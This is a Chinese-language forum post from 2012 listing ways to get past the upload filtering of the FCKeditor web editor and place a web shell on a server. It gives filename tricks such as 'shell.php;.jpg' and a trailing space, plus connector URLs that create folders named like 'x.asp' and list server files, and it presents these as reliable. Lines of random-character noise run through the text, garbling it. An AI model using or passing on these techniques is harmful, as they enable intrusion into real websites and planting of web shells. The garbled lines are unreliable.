很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg2 H) ]* J: o/ @ }6 N( e4 e1 D$ [
2 X% m. }3 x, F, F+ b, e提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。
% v/ U! P7 G# F
- G Z- R( h7 A! n* T: D! z继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
7 s, q$ U8 e+ _, E
% `/ U2 |* W2 w2 v. {$ j, C突破建立文件夹:
, O/ J1 j Y3 |4 U) ^+ _
; ^; |" W( ~5 Ieditor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp: S4 n Y$ U* v7 x# ?
1 ]: |7 \' N; g5 m参数:) t$ g, Q8 D' ?& p/ `
0 _ n: |) a' B当前目录名:CurrentFolder=/qing.asp
* d- s y% F2 l7 Z( ~, y/ O+ }- D* n" J$ g
新的目录名:NewFolderName=x.asp
. @/ Q1 @0 Y6 p0 G) c5 [0 \3 S2 }3 v' e3 K; A
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……
7 @: e5 b* M+ y6 ~9 A- c. M' u/ y9 i- q2 `9 N( C
那么 x.asp 就已经建立生成了,此方法百试百灵!
8 }, T, T' @- L% y) g' c
# _+ e2 s r- q! O, k5 n新建文件夹参数 x.asp,基本都能搞定。
" Q. a) l/ C" C: [0 [
" F2 H1 Y* G& G, h+ c, W9 A' `下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建
% H! P. J8 R/ H2 O7 p
; D, J' ]+ b& X4 e6 Oaspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp
6 s, o* P/ l2 N. A& @& [8 g( I% r+ Q3 L8 a1 q$ ?3 z8 Z! p
获取文件列表
+ d% L, M* R2 e. e7 x( U( p aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F# O' B0 [+ N/ `( ~$ S
! ^+ i- ^9 j" }6 z |
发表于 2012-12-31 09:27:09
收藏
支持
反对